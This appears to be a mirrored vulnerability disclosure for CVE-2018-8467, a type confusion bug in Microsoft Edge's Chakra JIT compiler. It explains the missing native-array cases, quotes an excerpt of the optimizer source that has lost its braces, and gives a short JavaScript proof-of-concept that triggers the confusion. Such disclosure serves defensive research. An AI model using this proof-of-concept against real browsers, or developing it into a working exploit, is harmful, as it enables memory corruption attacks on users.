Microsoft Edge Chakra JIT Type Confusion Bug

Related Vulnerabilities: CVE-2018-8467  
Publish Date: 11 Oct 2018
                Microsoft Edge: Chakra: JIT: Type confusion bug 


The switch statement only handles Js::TypeIds_Array but not Js::TypeIds_NativeIntArray and Js::TypeIds_NativeFloatArray. So for example, a native float array can be considered as of type ObjectType::Object under certain circumstances where "objValueType.IsLikelyArrayOrObjectWithArray()" is not fulfilled. As it doesn't install any array type conversion check for an definite object, handling a native array as an definite object can lead to type confusion.

GlobOpt::UpdateObjPtrValueType(IR::Opnd * opnd, IR::Instr * instr)
    if (newValueType == ValueType::Uninitialized)
        switch (typeId)
            if (typeId > Js::TypeIds_LastStaticType)
                Assert(typeId != Js::TypeIds_Proxy);
                if (objValueType.IsLikelyArrayOrObjectWithArray())
                    // If we have likely object with array before, we can't make it definite object with array
                    // since we have only proved that it is an object.
                    // Keep the likely array or object with array.
                    newValueType = ValueType::GetObject(ObjectType::Object);
        case Js::TypeIds_Array:
            // Because array can change type id, we can only make it definite if we are doing array check hoist
            // so that implicit call will be installed between the array checks.
            if (!DoArrayCheckHoist() ||
                ? !this->ImplicitCallFlagsAllowOpts(currentBlock->loop)
                : !this->ImplicitCallFlagsAllowOpts(this->func)))
            if (objValueType.IsLikelyArrayOrObjectWithArray())
                // If we have likely no missing values before, keep the likely, because, we haven't proven that
                // the array really has no missing values
                if (!objValueType.HasNoMissingValues())
                    newValueType = ValueType::GetObject(ObjectType::Array).SetArrayTypeId(typeId);
                newValueType = ValueType::GetObject(ObjectType::Array).SetArrayTypeId(typeId);

function opt(arr, arr2) {
    arr[0] = 1.1;

    arr2.method(arr2[0] = {});

    arr[0] = 2.3023e-320;

Object.prototype.method = () => {};

let arr = [1.1, 2.2];
for (let i = 0; i < 100; i++) {
    opt(arr, 1);  // Feeding an integer to make the value type LikelyCanBeTaggedValue_Int_PrimitiveOrObject
    opt(arr, arr.concat());

setTimeout(() => {
    opt(arr, arr);
}, 100);  // Waiting for the JIT server to finish its job.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.

Found by: lokihardt
